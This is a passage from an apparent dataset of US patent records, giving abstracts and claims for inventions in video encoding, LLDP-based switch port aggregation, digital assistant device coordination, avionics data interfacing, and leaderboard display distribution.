encoding a first portion of a first video frame at a lower quality level than a second portion of the first video frame based, at least in part, on a rate of change of objects portrayed in the second portion; and displaying the first and second encoded portions in a second video frame. 8. The method of claim 7, further comprising determining that the rate of change of objects portrayed in the second portion meets one or more thresholds. 9. The method of claim 7, further comprising detecting the rate of change of objects portrayed in the second portion by comparing the first video frame with at least one previous video frame. 10. The method of claim 7, further comprising detecting the rate of change of objects portrayed in the second portion based, at least in part, on the first video frame and a stored profile associated with an application that generates a video signal that includes the first video frame. 11. The method of claim 7, further comprising detecting the rate of change of objects portrayed in the second portion based, at least in part, on receiving an event indication from an application that generates a video signal that includes the first video frame. 12. The method of claim 7, wherein the lower quality level is associated with at least one of: a lower resolution, a lower frame rate, a lower bitrate, or a lower color depth. 13. The method of claim 7, further comprising predicting that a user attention would be drawn to the second portion instead of the first portion due to the rate of change of objects portrayed in the second portion. 14. The method of claim 7, further comprising predicting that the rate of change of objects portrayed in the second portion is a saccade-inducing event. 15. The method of claim 7, wherein the first and second portions are distinct. 16. The method of claim 7, wherein the first portion includes all of the first video frame other than the second portion. 17. 
A non-transitory computer-readable medium storing computer-executable instructions that, if executed, cause one or more processors to:
encode a first portion of a first video frame at a lower quality level than a second portion of the first video frame based, at least in part, on a rate of change of objects portrayed in the second portion; and display the first and second encoded portions in a second video frame. 18. The non-transitory computer-readable medium of claim 17, wherein the computer-executable instructions, if executed, further cause the one or more processors to predict that the rate of change of objects portrayed in the second portion is a saccade-inducing event. 19. The non-transitory computer-readable medium of claim 17, wherein the computer-executable instructions, if executed, further cause the one or more processors to detect the rate of change of objects portrayed in the second portion by comparing the first video frame with at least one previous video frame. 20. The non-transitory computer-readable medium of claim 17, wherein the computer-executable instructions, if executed, further cause the one or more processors to predict that a user attention would be drawn to the second portion instead of the first portion due to the rate of change of objects portrayed in the second portion. | 2,400 |
9,139 | 9,139 | 15,877,026 | 2,477 | A computer network includes a server computer having communication ports that are wired to switch ports of two separate network switches. The network switches receive link layer discovery protocol (LLDP) packets from other network devices, and automatically aggregate corresponding switch ports into a port channel aggregation based on the contents of the LLDP packets. | 1. A computer network comprising:
a first network switch; a second network switch; and a third network switch having a first switch port that is linked to a first switch port of the first network switch over a first wired connection, the third network switch further having a second switch port that is linked to a first switch port of the second network switch over a second wired connection, wherein the first network switch is adapted to receive a link layer discovery protocol (LLDP) packet over the first wired connection, scan the LLDP packet for a network management type-length-value (TLV), and add the first switch port of the first network switch to a port channel aggregation that includes the first switch port of the second network switch in response to finding the network management TLV in the LLDP packet. 2. The computer network of claim 1, further comprising:
a server computer having a first communication port and a second communication port, wherein the first communication port of the server computer is linked to a second switch port of the first network switch by way of a third wired connection and the second communication port of the server computer is linked to a second switch port of the second network switch by way of a fourth wired connection. 3. The computer network of claim 2, wherein each of the first and second communication ports comprises a network interface card (NIC) port. 4. The computer network of claim 3, wherein each of the third and fourth wired connections comprises a backplane connection. 5. The computer network of claim 1, wherein the first wired connection comprises an Ethernet cable. 6. The computer network of claim 2, wherein the first network switch is adapted to extract the network management TLV from the LLDP packet, and decode the network management TLV to identify a system identifier associated with the port channel aggregation. 7. The computer network of claim 6, further comprising:
a network manager that is adapted to manage the first network switch and the second network switch, wherein the first network switch is adapted to extract the network management TLV from the LLDP packet, and decode the network management TLV to identify an identifier of the network manager. 8. The computer network of claim 7, wherein the first network switch and the second network switch are configured as peer network devices, with the first network switch being a primary switch and the second network switch being a secondary switch. 9. A computer-implemented method of automatically configuring a multi-chassis link aggregation in network switches, the method comprising:
receiving a link layer discovery protocol (LLDP) packet at a first switch port of a first network switch, the first switch port of the first network switch being connected to a first switch port of a second network switch; determining, from contents of the LLDP packet, that the second network switch and the first network switch are managed by a same network manager; and in response to determining that the first and second network switches are managed by the same network manager, adding the first switch port to a port channel aggregation. 10. The computer-implemented method of claim 9, wherein determining that the second network switch and the first network switch are managed by the same network manager comprises:
identifying a network management type-length-value (TLV) in the LLDP packet. 11. The computer-implemented method of claim 10, further comprising:
decoding the network management TLV to identify a system identifier of the first network switch. 12. The computer-implemented method of claim 11, further comprising:
decoding the network management TLV to identify an identifier of the network manager that manages the first and second network switches. 13. A network switch comprising:
a first switch port; a processor; and a memory that is configured to store instructions that when executed by the processor cause the network switch to: receive a link layer discovery protocol (LLDP) packet at the first switch port; determine, from contents of the LLDP packet, that the network switch and another network switch that sent the LLDP packet to the network switch are managed by a same network manager; and add the first switch port to a port channel aggregation in response to determining that the network switch and the other network switch are managed by the same network manager. 14. The network switch of claim 13, wherein the instructions stored in the memory, when executed by the processor, further cause the network switch to:
extract a network management type-length-value (TLV) from the LLDP packet. 15. The network switch of claim 14, wherein the instructions stored in the memory, when executed by the processor, further cause the network switch to:
decode the network management TLV to identify a system identifier of the network switch. 16. The network switch of claim 15, wherein the instructions stored in the memory, when executed by the processor, further cause the network switch to:
decode the network management TLV to identify an identifier of the network manager. | A computer network includes a server computer having communication ports that are wired to switch ports of two separate network switches. The network switches receive link layer discovery protocol (LLDP) packets from other network devices, and automatically aggregate corresponding switch ports into a port channel aggregation based on the contents of the LLDP packets. 1. A computer network comprising:
a first network switch; a second network switch; and a third network switch having a first switch port that is linked to a first switch port of the first network switch over a first wired connection, the third network switch further having a second switch port that is linked to a first switch port of the second network switch over a second wired connection, wherein the first network switch is adapted to receive a link layer discovery protocol (LLDP) packet over the first wired connection, scan the LLDP packet for a network management type-length-value (TLV), and add the first switch port of the first network switch to a port channel aggregation that includes the first switch port of the second network switch in response to finding the network management TLV in the LLDP packet. 2. The computer network of claim 1, further comprising:
a server computer having a first communication port and a second communication port, wherein the first communication port of the server computer is linked to a second switch port of the first network switch by way of a third wired connection and the second communication port of the server computer is linked to a second switch port of the second network switch by way of a fourth wired connection. 3. The computer network of claim 2, wherein each of the first and second communication ports comprises a network interface card (NIC) port. 4. The computer network of claim 3, wherein each of the third and fourth wired connections comprises a backplane connection. 5. The computer network of claim 1, wherein the first wired connection comprises an Ethernet cable. 6. The computer network of claim 2, wherein the first network switch is adapted to extract the network management TLV from the LLDP packet, and decode the network management TLV to identify a system identifier associated with the port channel aggregation. 7. The computer network of claim 6, further comprising:
a network manager that is adapted to manage the first network switch and the second network switch, wherein the first network switch is adapted to extract the network management TLV from the LLDP packet, and decode the network management TLV to identify an identifier of the network manager. 8. The computer network of claim 7, wherein the first network switch and the second network switch are configured as peer network devices, with the first network switch being a primary switch and the second network switch being a secondary switch. 9. A computer-implemented method of automatically configuring a multi-chassis link aggregation in network switches, the method comprising:
receiving a link layer discovery protocol (LLDP) packet at a first switch port of a first network switch, the first switch port of the first network switch being connected to a first switch port of a second network switch; determining, from contents of the LLDP packet, that the second network switch and the first network switch are managed by a same network manager; and in response to determining that the first and second network switches are managed by the same network manager, adding the first switch port to a port channel aggregation. 10. The computer-implemented method of claim 9, wherein determining that the second network switch and the first network switch are managed by the same network manager comprises:
identifying a network management type-length-value (TLV) in the LLDP packet. 11. The computer-implemented method of claim 10, further comprising:
decoding the network management TLV to identify a system identifier of the first network switch. 12. The computer-implemented method of claim 11, further comprising:
decoding the network management TLV to identify an identifier of the network manager that manages the first and second network switches. 13. A network switch comprising:
a first switch port; a processor; and a memory that is configured to store instructions that when executed by the processor cause the network switch to: receive a link layer discovery protocol (LLDP) packet at the first switch port; determine, from contents of the LLDP packet, that the network switch and another network switch that sent the LLDP packet to the network switch are managed by a same network manager; and add the first switch port to a port channel aggregation in response to determining that the network switch and the other network switch are managed by the same network manager. 14. The network switch of claim 13, wherein the instructions stored in the memory, when executed by the processor, further cause the network switch to:
extract a network management type-length-value (TLV) from the LLDP packet. 15. The network switch of claim 14, wherein the instructions stored in the memory, when executed by the processor, further cause the network switch to:
decode the network management TLV to identify a system identifier of the network switch. 16. The network switch of claim 15, wherein the instructions stored in the memory, when executed by the processor, further cause the network switch to:
decode the network management TLV to identify an identifier of the network manager. | 2,400 |
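The TLV scan and aggregation decision recited in the claims above can be sketched roughly as follows. This is a minimal illustration only: the LLDP TLV header layout (7-bit type, 9-bit length) and the organizationally-specific TLV type 127 follow the LLDP standard, but the network-management subtype value and the payload layout (OUI, subtype, 4-byte manager identifier, 4-byte system identifier) are hypothetical assumptions, not drawn from the patent or any real switch firmware.

```python
# Sketch: scan an LLDPDU for a (hypothetical) network-management TLV and add
# the receiving switch port to a port channel aggregation when the peer
# reports the same network manager.

ORG_SPECIFIC_TLV = 127        # standard LLDP organizationally-specific TLV type
NETWORK_MGMT_SUBTYPE = 0x01   # hypothetical subtype carrying manager/system IDs

def parse_tlvs(frame: bytes):
    """Yield (tlv_type, payload) pairs from raw LLDPDU bytes."""
    i = 0
    while i + 2 <= len(frame):
        header = int.from_bytes(frame[i:i + 2], "big")
        tlv_type, length = header >> 9, header & 0x1FF
        if tlv_type == 0:     # End-of-LLDPDU TLV
            break
        yield tlv_type, frame[i + 2:i + 2 + length]
        i += 2 + length

def find_mgmt_tlv(frame: bytes):
    """Return (manager_id, system_id) if a network-management TLV is present."""
    for tlv_type, payload in parse_tlvs(frame):
        if (tlv_type == ORG_SPECIFIC_TLV and len(payload) >= 12
                and payload[3] == NETWORK_MGMT_SUBTYPE):
            # Assumed layout: bytes 0-2 OUI, byte 3 subtype,
            # bytes 4-7 manager id, bytes 8-11 system id.
            return payload[4:8], payload[8:12]
    return None

def maybe_aggregate(frame: bytes, rx_port: str, local_manager_id: bytes,
                    port_channel: set):
    """Add rx_port to the aggregation when the peer has the same manager."""
    ids = find_mgmt_tlv(frame)
    if ids and ids[0] == local_manager_id:
        port_channel.add(rx_port)
    return port_channel
```

In this sketch the same-manager check of method claim 9 reduces to comparing the manager identifier decoded from the TLV against the switch's own; a port joins the aggregation only when the identifiers match.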
9,140 | 9,140 | 15,666,712 | 2,424 | A computer implemented method, device and computer program device are provided that are under control of one or more processors configured with executable instructions. The method receives a user instruction to perform an action, identifies context awareness information concerning an environment where the action is to be performed. The environment includes a plurality of candidate electronic devices. At least one of the candidate electronic devices provides digital personal assistant (DPA) functionality. The method groups a collection of one or more responsive electronic devices, from the plurality of candidate electronic devices, based on the context awareness information. The method communicates the instruction to the collection of one or more responsive electronic devices to coordinate the action by the collection of one or more responsive electronic devices. | 1. A method, comprising:
under control of one or more processors configured with executable instructions; receiving a user instruction to perform an action; identifying context awareness information concerning an environment where the action is to be performed, the environment including a plurality of candidate electronic devices, at least one of the candidate electronic devices to provide digital personal assistant (DPA) functionality; grouping a collection of one or more responsive electronic devices, from the plurality of candidate electronic devices, based on the context awareness information; and communicating the instruction to the collection of one or more responsive electronic devices to coordinate the action by the responsive collection. 2. The method of claim 1, wherein the plurality of electronic devices include a DPA device, and wherein one or more of the identifying, grouping and communicating are performed by the DPA device. 3. The method of claim 2, further comprising determining whether to include the DPA device in the collection of one or more responsive electronic devices that perform the action. 4. The method of claim 1, wherein the context awareness information includes information indicative of a condition present in the environment in which the corresponding electronic devices are located. 5. The method of claim 1, wherein the collection of one or more responsive electronic devices include multiple DPA devices, and wherein the communicating the instruction includes coordinating an operation of the multiple DPA devices to act jointly in a manner perceived by one or more individuals within the environment. 6. The method of claim 5, wherein the environment represents a physical region in which the multiple DPA devices are located and in which the joint action is one or more of heard, seen, or felt by the one or more individuals. 7. 
The method of claim 1, wherein the identifying includes determining activity in a region surrounding a first electronic device from the plurality of electronic devices. 8. The method of claim 7, wherein the determining activity is based on one or more of calendar data, motion data, sleep habit data or device usage data. 9. The method of claim 1, further comprising identifying the plurality of candidate electronic devices based on availability on a network. 10. A device, comprising:
an input to receive a user instruction to perform an action; a processor; a memory storing program instructions accessible by the processor, wherein, responsive to execution of the program instructions, the processor performs the following:
identifying context awareness information concerning an environment where the action is to be performed, the environment including a plurality of candidate electronic devices, at least one of the candidate electronic devices to provide digital personal assistant (DPA) functionality; and
grouping a collection of one or more responsive electronic devices, from the plurality of candidate electronic devices, based on the context awareness information; and
a transceiver to communicate the instruction to the collection of one or more responsive electronic devices to perform the action by the responsive collection. 11. The device of claim 10, wherein the device is a DPA device. 12. The device of claim 11, the processor further to modify the instruction to include a device command to open a streaming channel and to play audio content that is streamed to the collection of one or more responsive electronic devices. 13. The device of claim 10, wherein the context awareness information includes information indicative of a condition present in the environment in which the corresponding electronic devices are located. 14. The device of claim 10, wherein the collection of one or more responsive electronic devices include multiple DPA devices, and wherein the transceiver sends the instruction to the multiple DPA devices to coordinate an operation of the multiple DPA devices to act jointly in a manner perceived by one or more individuals within the environment. 15. The device of claim 10, further comprising an activity or control circuit including one or more of a motion sensor, light switch, room thermostat, door locking circuit, or appliance to provide the context awareness information. 16. The device of claim 10, the processor to determine activity in a region surrounding a first electronic device from the plurality of electronic devices, the activity associated with the context awareness information. 17. The device of claim 16, the processor to determine the activity based on one or more of calendar data, motion data, sleep habit data or device usage data. 18. A computer program product comprising a non-signal computer readable storage medium comprising computer executable code to:
receive a user instruction to perform an action; identify context awareness information concerning an environment where the action is to be performed, the environment including a plurality of candidate electronic devices, at least one of the candidate electronic devices to provide digital personal assistant (DPA) functionality; automatically group a collection of one or more responsive electronic devices, from the plurality of candidate electronic devices, based on the user instruction and the context awareness information; and communicate the instruction to the collection of one or more responsive electronic devices to perform the action by the collection of one or more responsive electronic devices. 19. The computer program product of claim 18, wherein the computer executable code further to store a list of one or more candidate electronic devices that are registered for use within a network, the list including unique identifying information for the electronic devices, as well as operating characteristics of the electronic devices relevant to a type of action that the electronic devices perform. 20. The computer program product of claim 18, wherein the computer executable code further to store a DPA device application that includes voice recognition, the DPA device application to interpret natural language input in spoken form to infer intent therefrom, and perform actions based on the inferred intent. | A computer implemented method, device and computer program device are provided that are under control of one or more processors configured with executable instructions. The method receives a user instruction to perform an action, identifies context awareness information concerning an environment where the action is to be performed. The environment includes a plurality of candidate electronic devices. At least one of the candidate electronic devices provides digital personal assistant (DPA) functionality. 
The method groups a collection of one or more responsive electronic devices, from the plurality of candidate electronic devices, based on the context awareness information. The method communicates the instruction to the collection of one or more responsive electronic devices to coordinate the action by the collection of one or more responsive electronic devices. 1. A method, comprising:
under control of one or more processors configured with executable instructions; receiving a user instruction to perform an action; identifying context awareness information concerning an environment where the action is to be performed, the environment including a plurality of candidate electronic devices, at least one of the candidate electronic devices to provide digital personal assistant (DPA) functionality; grouping a collection of one or more responsive electronic devices, from the plurality of candidate electronic devices, based on the context awareness information; and communicating the instruction to the collection of one or more responsive electronic devices to coordinate the action by the responsive collection. 2. The method of claim 1, wherein the plurality of electronic devices include a DPA device, and wherein one or more of the identifying, grouping and communicating are performed by the DPA device. 3. The method of claim 2, further comprising determining whether to include the DPA device in the collection of one or more responsive electronic devices that perform the action. 4. The method of claim 1, wherein the context awareness information includes information indicative of a condition present in the environment in which the corresponding electronic devices are located. 5. The method of claim 1, wherein the collection of one or more responsive electronic devices include multiple DPA devices, and wherein the communicating the instruction includes coordinating an operation of the multiple DPA devices to act jointly in a manner perceived by one or more individuals within the environment. 6. The method of claim 5, wherein the environment represents a physical region in which the multiple DPA devices are located and in which the joint action is one or more of heard, seen, or felt by the one or more individuals. 7. 
The method of claim 1, wherein the identifying includes determining activity in a region surrounding a first electronic device from the plurality of electronic devices. 8. The method of claim 7, wherein the determining activity is based on one or more of calendar data, motion data, sleep habit data or device usage data. 9. The method of claim 1, further comprising identifying the plurality of candidate electronic devices based on availability on a network. 10. A device, comprising:
an input to receive a user instruction to perform an action; a processor; a memory storing program instructions accessible by the processor, wherein, responsive to execution of the program instructions, the processor performs the following:
identifying context awareness information concerning an environment where the action is to be performed, the environment including a plurality of candidate electronic devices, at least one of the candidate electronic devices to provide digital personal assistant (DPA) functionality; and
grouping a collection of one or more responsive electronic devices, from the plurality of candidate electronic devices, based on the context awareness information; and
a transceiver to communicate the instruction to the collection of one or more responsive electronic devices to perform the action by the responsive collection. 11. The device of claim 10, wherein the device is a DPA device. 12. The device of claim 11, the processor further to modify the instruction to include a device command to open a streaming channel and to play audio content that is streamed to the collection of one or more responsive electronic devices. 13. The device of claim 10, wherein the context awareness information includes information indicative of a condition present in the environment in which the corresponding electronic devices are located. 14. The device of claim 10, wherein the collection of one or more responsive electronic devices include multiple DPA devices, and wherein the transceiver sends the instruction to the multiple DPA devices to coordinate an operation of the multiple DPA devices to act jointly in a manner perceived by one or more individuals within the environment. 15. The device of claim 10, further comprising an activity or control circuit including one or more of a motion sensor, light switch, room thermostat, door locking circuit, or appliance to provide the context awareness information. 16. The device of claim 10, the processor to determine activity in a region surrounding a first electronic device from the plurality of electronic devices, the activity associated with the context awareness information. 17. The device of claim 16, the processor to determine the activity based on one or more of calendar data, motion data, sleep habit data or device usage data. 18. A computer program product comprising a non-signal computer readable storage medium comprising computer executable code to:
receive a user instruction to perform an action; identify context awareness information concerning an environment where the action is to be performed, the environment including a plurality of candidate electronic devices, at least one of the candidate electronic devices to provide digital personal assistant (DPA) functionality; automatically group a collection of one or more responsive electronic devices, from the plurality of candidate electronic devices, based on the user instruction and the context awareness information; and communicate the instruction to the collection of one or more responsive electronic devices to perform the action by the collection of one or more responsive electronic devices. 19. The computer program product of claim 18, wherein the computer executable code further to store a list of one or more candidate electronic devices that are registered for use within a network, the list including unique identifying information for the electronic devices, as well as operating characteristics of the electronic devices relevant to a type of action that the electronic devices perform. 20. The computer program product of claim 18, wherein the computer executable code further to store a DPA device application that includes voice recognition, the DPA device application to interpret natural language input in spoken form to infer intent therefrom, and perform actions based on the inferred intent. | 2,400 |
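The grouping-and-coordination steps described in the claims above can be sketched as follows. This is a minimal illustration under assumed data shapes: the `Device` fields, the `occupied_room` context key, and the dictionary-based fan-out are all hypothetical stand-ins for whatever registry, sensor data, and transport a real system would use; none of them are drawn from the patent.

```python
# Sketch: group a collection of responsive devices from the candidates using
# context-awareness information, then fan the instruction out to them.

from dataclasses import dataclass

@dataclass
class Device:
    name: str
    room: str
    actions: set           # action types this device can perform
    is_dpa: bool = False   # provides digital personal assistant functionality

def group_responsive(candidates, action, context):
    """Return the devices that can perform `action` in the environment
    described by `context` (here simply: the occupied room)."""
    return [d for d in candidates
            if action in d.actions and d.room == context["occupied_room"]]

def coordinate(candidates, instruction, context):
    """Communicate the instruction to each responsive device (stub transport)."""
    collection = group_responsive(candidates, instruction["action"], context)
    return {d.name: instruction["action"] for d in collection}
```

A DPA device performing the grouping would itself appear among the candidates, matching the claim in which the method determines whether to include the DPA device in the responsive collection.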
9,141 | 9,141 | 15,685,201 | 2,435 | Systems and methods are provided for FAA-certified avionics devices to safely interface with non-certified mobile telecommunications devices before, during, and after flight. Data transmitted to the certified devices do not affect functionality of the certified device unless and until a user acknowledges and/or confirms the data on the certified device. Thus, the integrity of the certified device is maintained. | 1. A method of processing information on-board an aircraft having aircraft equipment, the method comprising:
utilizing a first device to record aircraft data pertaining to the aircraft; operably connecting a second device within said aircraft to said first device; and uploading the aircraft data from the first device onto the second device, wherein the second device is a non-certified device. 2. The method as claimed in claim 1, further comprising uploading data from the second device to the aircraft equipment. 3. The method as claimed in claim 1, further comprising operably connecting the first device with a mobile server. 4. The method as claimed in claim 3, further comprising operably connecting the second device with the mobile server via the first device. 5. The method as claimed in claim 1 wherein said step of operably connecting said second device to said first device comprises:
generating an encrypted license key for a mobile server in operable data connection with said first device;
hosting said license key on a license server;
providing authorization credentials of the second device to said license server;
downloading said license key from said license server to said second device;
storing said license key within cache on said second device;
establishing a data connection between said mobile server and said second device;
providing said license key to said mobile server for validation;
requesting access by said second device to one or more data resources available via said mobile server in operable data connection with said first device; and
decrypting and validating said license key by said mobile server before authorizing said second device access to said one or more data resources available via said mobile server in operable data connection with said first device. 6. A method of processing information on-board an aircraft having aircraft equipment, the method comprising:
operably connecting a non-certified device within said aircraft to said aircraft equipment; transmitting non-certified information from said non-certified device; and receiving by said aircraft equipment said non-certified information. 7. The method as claimed in claim 6, wherein said transmitting step is performed through a gateway device. 8. The method as claimed in claim 6, further comprising:
generating a request for a user acknowledgement or confirmation after said aircraft equipment receives said non-certified information; and allowing changes to information or functionality of said aircraft equipment based on said received non-certified information only after said user acknowledgement or confirmation is provided. 9. The method as claimed in claim 6, further comprising the steps of:
connecting said aircraft equipment to an avionics display installed in said aircraft, wherein said avionics display is non-certified; and displaying said non-certified information transmitted from said non-certified device on said avionics display. 10. A method of displaying information on-board an aircraft comprising the steps of:
providing an avionics device installed in said aircraft; operably connecting a second device within said aircraft to said avionics device, wherein said second device is a non-certified device; transmitting information from said avionics device to said second device; generating an encrypted license key for a mobile server in operable data connection with said avionics device; hosting said license key on a license server; providing authorization credentials of the second device to said license server; downloading said license key from said license server to said second device; storing said license key within cache on said second device; establishing a data connection between said mobile server and said second device; providing said license key to said mobile server for validation; requesting access by said second device to one or more data resources available via said mobile server in operable data connection with said avionics device; and decrypting and validating said license key by said mobile server before authorizing said second device access to said one or more data resources available via said mobile server in operable data connection with said avionics device. 11. The method as claimed in claim 10, wherein said transmitting step is performed through a gateway device. 12. A system for transmitting and receiving aircraft data communications, the system comprising:
a first device associated with the aircraft, said first device being configured to receive data; a second device configured to send a first package of data to said first device, said second device being a non-certified mobile computing device; a display configured to display information associated with said first package of data; and a gateway hardware device configured to provide a secure data communication connection between said first device and said second device, wherein the system is configured to receive user inputs associated with the first package of data as a user validation of the first package of data, thereby creating a first validated package of data, wherein the system is configured to utilize the first validated package of data to change information or functionality of the first device, and wherein the system is configured such that the first package of data is not utilized to change information or functionality of the first device unless the first package of data is validated by a user. 13. A method of processing information on-board an aircraft having an avionics device, the method comprising:
operably connecting a second device within the aircraft to the avionics device, the second device being a non-certified device; generating a first package of data comprising FAA-certified information; receiving by the second device the first package of data, utilizing by the second device the first package of data to generate a second package of data comprising non-certified information; transmitting by the second device the second package of data; and receiving by the avionics device the second package of data. 14. The method as claimed in claim 13, further comprising storing information within a data store. 15. The method as claimed in claim 14, wherein the second device receives at least some of the certified information from the data store. 16. The method as claimed in claim 14, wherein the non-certified information includes instructions for manipulating at least some of the data stored in the data store. 17. The method as claimed in claim 16, wherein at least some of the information stored in the data store includes information pertaining to an application configuration associated with the second device of the second package of data. 18. The method as claimed in claim 16, wherein at least some of the information stored in the data store includes information pertaining to a state of the second device. | Systems and methods are provided for FAA-certified avionics devices to safely interface with non-certified mobile telecommunications devices before, during, and after flight. Data transmitted to the certified devices do not affect functionality of the certified device unless and until a user acknowledges and/or confirms the data on the certified device. Thus, the integrity of the certified device is maintained.1. A method of processing information on-board an aircraft having aircraft equipment, the method comprising:
utilizing a first device to record aircraft data pertaining to the aircraft; operably connecting a second device within said aircraft to said first device; and uploading the aircraft data from the first device onto the second device, wherein the second device is a non-certified device. 2. The method as claimed in claim 1, further comprising uploading data from the second device to the aircraft equipment. 3. The method as claimed in claim 1, further comprising operably connecting the first device with a mobile server. 4. The method as claimed in claim 3, further comprising operably connecting the second device with the mobile server via the first device. 5. The method as claimed in claim 1 wherein said step of operably connecting said second device to said first device comprises:
generating an encrypted license key for a mobile server in operable data connection with said first device;
hosting said license key on a license server;
providing authorization credentials of the second device to said license server;
downloading said license key from said license server to said second device;
storing said license key within cache on said second device;
establishing a data connection between said mobile server and said second device;
providing said license key to said mobile server for validation;
requesting access by said second device to one or more data resources available via said mobile server in operable data connection with said first device; and
decrypting and validating said license key by said mobile server before authorizing said second device access to said one or more data resources available via said mobile server in operable data connection with said first device. 6. A method of processing information on-board an aircraft having aircraft equipment, the method comprising:
operably connecting a non-certified device within said aircraft to said aircraft equipment; transmitting non-certified information from said non-certified device; and receiving by said aircraft equipment said non-certified information. 7. The method as claimed in claim 6, wherein said transmitting step is performed through a gateway device. 8. The method as claimed in claim 6, further comprising:
generating a request for a user acknowledgement or confirmation after said aircraft equipment receives said non-certified information; and allowing changes to information or functionality of said aircraft equipment based on said received non-certified information only after said user acknowledgement or confirmation is provided. 9. The method as claimed in claim 6, further comprising the steps of:
connecting said aircraft equipment to an avionics display installed in said aircraft, wherein said avionics display is non-certified; and displaying said non-certified information transmitted from said non-certified device on said avionics display. 10. A method of displaying information on-board an aircraft comprising the steps of:
providing an avionics device installed in said aircraft; operably connecting a second device within said aircraft to said avionics device, wherein said second device is a non-certified device; transmitting information from said avionics device to said second device; generating an encrypted license key for a mobile server in operable data connection with said avionics device; hosting said license key on a license server; providing authorization credentials of the second device to said license server; downloading said license key from said license server to said second device; storing said license key within cache on said second device; establishing a data connection between said mobile server and said second device; providing said license key to said mobile server for validation; requesting access by said second device to one or more data resources available via said mobile server in operable data connection with said avionics device; and decrypting and validating said license key by said mobile server before authorizing said second device access to said one or more data resources available via said mobile server in operable data connection with said avionics device. 11. The method as claimed in claim 10, wherein said transmitting step is performed through a gateway device. 12. A system for transmitting and receiving aircraft data communications, the system comprising:
a first device associated with the aircraft, said first device being configured to receive data; a second device configured to send a first package of data to said first device, said second device being a non-certified mobile computing device; a display configured to display information associated with said first package of data; and a gateway hardware device configured to provide a secure data communication connection between said first device and said second device, wherein the system is configured to receive user inputs associated with the first package of data as a user validation of the first package of data, thereby creating a first validated package of data, wherein the system is configured to utilize the first validated package of data to change information or functionality of the first device, and wherein the system is configured such that the first package of data is not utilized to change information or functionality of the first device unless the first package of data is validated by a user. 13. A method of processing information on-board an aircraft having an avionics device, the method comprising:
operably connecting a second device within the aircraft to the avionics device, the second device being a non-certified device; generating a first package of data comprising FAA-certified information; receiving by the second device the first package of data, utilizing by the second device the first package of data to generate a second package of data comprising non-certified information; transmitting by the second device the second package of data; and receiving by the avionics device the second package of data. 14. The method as claimed in claim 13, further comprising storing information within a data store. 15. The method as claimed in claim 14, wherein the second device receives at least some of the certified information from the data store. 16. The method as claimed in claim 14, wherein the non-certified information includes instructions for manipulating at least some of the data stored in the data store. 17. The method as claimed in claim 16, wherein at least some of the information stored in the data store includes information pertaining to an application configuration associated with the second device of the second package of data. 18. The method as claimed in claim 16, wherein at least some of the information stored in the data store includes information pertaining to a state of the second device. | 2,400 |
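The license-key steps recited in the record above (generate an encrypted key, host it on a license server, download it against authorization credentials, cache it on the second device, and validate it on the mobile server before authorizing access to data resources) can be sketched as follows. This is a minimal illustration only: the claims leave the encryption scheme unspecified, so an HMAC-signed token stands in for the "encrypted license key", and all names (`LicenseServer`, `MobileServer`, the secret) are hypothetical.

```python
import hashlib
import hmac
import json

# Hypothetical shared secret; the claims do not specify the key-protection scheme.
SECRET = b"mobile-server-secret"

def generate_license_key(device_id: str) -> str:
    """Mobile server side: produce a signed token standing in for the claimed
    'encrypted license key'."""
    payload = json.dumps({"device": device_id}).encode()
    tag = hmac.new(SECRET, payload, hashlib.sha256).hexdigest()
    return payload.hex() + "." + tag

class LicenseServer:
    """Hosts license keys; releases a key only against authorization credentials."""
    def __init__(self):
        self._keys = {}    # device_id -> license key
        self._creds = {}   # device_id -> expected credential

    def host(self, device_id: str, key: str, credential: str) -> None:
        self._keys[device_id] = key
        self._creds[device_id] = credential

    def download(self, device_id: str, credential: str) -> str:
        if self._creds.get(device_id) != credential:
            raise PermissionError("bad authorization credentials")
        return self._keys[device_id]

class MobileServer:
    """Validates a presented key before authorizing access to a data resource."""
    def validate(self, key: str) -> bool:
        try:
            payload_hex, tag = key.split(".")
            payload = bytes.fromhex(payload_hex)
        except ValueError:
            return False
        expected = hmac.new(SECRET, payload, hashlib.sha256).hexdigest()
        return hmac.compare_digest(tag, expected)

    def request_access(self, key: str, resource: str) -> str:
        if not self.validate(key):
            raise PermissionError("invalid license key")
        return f"access granted to {resource}"
```

In use, the second device would download the key with its credentials, keep it in a local cache, and present it on each resource request; only a key that validates against the mobile server's secret yields access.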
9,142 | 9,142 | 15,093,068 | 2,421 | A leaderboard parsing and distribution system comprises at least one computing device. The at least one computing device comprises at least one processor. The leaderboard parsing and distribution system comprises a plurality of display devices communicatively coupled to the at least one computing device. The leaderboard parsing and distribution system comprises a non-transitory machine readable medium. The non-transitory machine readable medium comprises instructions configured to cause the at least one processor to access leaderboard data. For at least two display devices in the plurality of display devices, the non-transitory machine readable medium comprises instructions configured to cause the at least one processor to select a subset of the leaderboard data to be displayed on each of the at least two display devices, and cause the subset of the leaderboard data to be displayed on the each of the at least two display devices. | 1. A leaderboard parsing and distribution system comprising:
a. at least one computing device comprising at least one processor; b. a plurality of display devices communicatively coupled to the at least one computing device; and c. a non-transitory machine readable medium comprising instructions configured to cause the at least one processor to:
i. access leaderboard data; and
ii. for at least two display devices in the plurality of display devices:
1. select a subset of the leaderboard data to be displayed on each of the at least two display devices; and
2. cause the subset of the leaderboard data to be displayed on the each of the at least two display devices. 2. The leaderboard parsing and distribution system according to claim 1, wherein the at least one computing device comprises at least one of the following:
a. a personal computer; b. a computer server; c. a mobile device; and d. a tablet. 3. The leaderboard parsing and distribution system according to claim 1, wherein at least two of the plurality of display devices are configured for multiple spectator viewing. 4. The leaderboard parsing and distribution system according to claim 1, wherein at least one display device in the plurality of display devices is configured to be portable. 5. The leaderboard parsing and distribution system according to claim 1, wherein the leaderboard data comprises at least one of the following:
a. HTML data; b. XML data; c. image data; and d. text. 6. The leaderboard parsing and distribution system according to claim 1, wherein the subset of the leaderboard data comprises data identifying at least one of the following:
a. a flight of golfers; b. a plurality of flights of golfers; c. an athlete; d. a plurality of athletes; e. a team; f. a plurality of teams; g. a competitor; h. a plurality of competitors; i. a contestant; and j. a plurality of contestants. 7. The leaderboard parsing and distribution system according to claim 1, wherein the machine readable medium further comprises instructions configured to cause the at least one processor to update the subset of the leaderboard data at regular intervals. 8. The leaderboard parsing and distribution system according to claim 1, further comprising a user interface and wherein the machine readable medium further comprises instructions configured to cause the at least one processor to enable a user via the user interface to select the subset of the leaderboard data and direct the subset to a specific display device in the plurality of display devices. 9. The leaderboard parsing and distribution system according to claim 1, wherein the machine readable medium further comprises instructions configured to cause the at least one processor to accept registrations for at least one of the following:
